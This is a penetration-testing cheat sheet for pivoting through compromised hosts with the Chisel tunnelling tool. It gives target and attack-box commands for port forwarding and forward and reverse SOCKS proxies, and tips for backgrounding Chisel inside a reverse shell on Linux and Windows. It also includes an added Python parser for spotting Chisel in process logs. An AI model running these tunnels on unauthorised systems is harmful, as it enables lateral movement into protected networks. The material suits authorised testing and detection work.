
Chisel

Pivoting using Chisel

Requirements

Requires a copy of the Chisel binary on both the target and attacker systems.

Advantages

  • Chisel is a portable binary that can be run on many operating systems

    • Either system can host the chisel server on a chosen TCP port

    • Allows for a high amount of flexibility in situations where restrictions on connectivity exist

  • No dependencies on SSH daemons/services running on the target

  • Supports authenticated proxies to prevent unwanted connections.

Individual Port Forwarding

Example: A service on a compromised host is listening on $RPORT

  1. Run the Chisel server on the target and connect from the attack box

  2. Specify the port forward on the client

  3. Open a port on attack box and forward traffic to remote port

# Target Machine
./chisel server --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LHOST:$LPORT:$RHOST:$RPORT

Opens $LPORT on the attack box and forwards connections to $RPORT on the target.

Reverse Individual Port Forwarding

Example: A service on a compromised host is listening on $LPORT

  1. Run the Chisel server on the attack box in reverse mode and connect from the target

  2. Specify the port forward on the target machine

  3. Open a port on attack box and forward traffic to remote port

# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:$RPORT:$LHOST:$LPORT

Open $RPORT on attack box and forward to $LPORT on target through reverse connection.

Socks Proxy

Server Running on Attack Box

# Attack Machine
./chisel server --reverse --port 51234

# Target Machine
./chisel client $AttackIP:51234 R:127.0.0.1:54321:socks

Opens port 54321 on the attack box as a reverse SOCKS proxy. The Chisel server listens on this port, bound to 127.0.0.1, for SOCKS client connections.

Chisel Server Running on Target

# Target Machine
./chisel server --socks5 --port 51234

# Attack Machine
./chisel client $targetIP:51234 54321:socks

Opens port 54321 on the attack machine as a forward SOCKS proxy.

Forward Dynamic SOCKS Proxy

  1. Run the Chisel server on the target box

  2. Use the target box as a jump host to reach additional targets routable by the target

The traffic flows forward to the target box, which acts as a transparent SOCKS proxy

# Target Machine
./chisel server --socks5 --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LPORT:socks

Reverse Dynamic SOCKS Proxy

  1. Run the Chisel server on the attack box in reverse mode

  2. Connect to the Chisel server from the target and specify a reverse port forward

The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy

# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:127.0.0.1:$LPORT:socks
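
When these command lines turn up in process-creation logs, the remote string shows which end opens the listener and where the traffic is delivered. The decoder below is an added example, not part of the original page or of the Chisel project; `parse_remote`, `describe_command` and the sample lines are constructed for illustration, and it covers only the remote forms used on this page.

```python
import re

def parse_remote(spec):
    """Decode the remote forms used on this page:
    [R:][listen_host:]listen_port:dest_host:dest_port  or  [R:][listen_host:]listen_port:socks"""
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    socks = parts[-1] == "socks"
    head = parts[:-1] if socks else parts[:-2]
    if not 1 <= len(head) <= 2 or not head[-1].isdigit():
        raise ValueError(f"remote form not covered here: {spec!r}")
    return {
        "reverse": reverse,
        # Reverse remotes open the listener on the chisel server, forward ones on the client.
        "listener_side": "server" if reverse else "client",
        "listen_host": head[0] if len(head) == 2 else None,  # None: chisel's default applies
        "listen_port": int(head[-1]),
        # The destination is dialled from the opposite end of the tunnel.
        "dest": "socks" if socks else ":".join(parts[-2:]),
        "socks": socks,
    }

def describe_command(cmdline):
    """Summarise a chisel command line; None if it is not one. Assumes the binary keeps
    its name and the client passes no flags, as in every command on this page."""
    argv = cmdline.split()
    for i, tok in enumerate(argv[:-1]):
        if re.search(r"chisel(\.exe)?$", tok, re.IGNORECASE) and argv[i + 1] in ("client", "server"):
            mode, rest = argv[i + 1], argv[i + 2:]
            if mode == "server":
                return {"mode": mode, "reverse": "--reverse" in rest, "socks5": "--socks5" in rest}
            return {"mode": mode, "server": rest[0] if rest else None,
                    "remotes": [parse_remote(r) for r in rest[1:]]}
    return None

# Constructed process-creation command lines, built from the page's own examples.
SAMPLE = [
    "./chisel server --reverse --port 51234",
    "./chisel client 10.0.0.2:51234 R:127.0.0.1:54321:socks",
    r"C:\Windows\Temp\chisel.exe client 10.0.0.2:8080 R:127.0.0.1:8800:127.0.0.1:80",
    "./chisel client 10.0.0.5:51234 54321:socks",
    "/usr/bin/rsync -a /srv/ backup:/srv/",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(line, "->", describe_command(line))
```

Matching on the binary name misses renamed copies, so pair it with the shape of the remote string and with network telemetry for the server port.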

Reverse Shell Tips

Run Chisel in the Background

Running chisel in the foreground in a reverse shell will render your shell useless. Background the process in order to continue to use the shell while forwarding traffic.

Linux

Background a process with '&'. Works for both client and server sides.

chisel server --port 8080 --reverse &

Windows - PowerShell

Client Side

# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $background

Server Side

Note that in server mode, you'll need to make sure your port is allowed through the firewall.

# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $background

References

https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel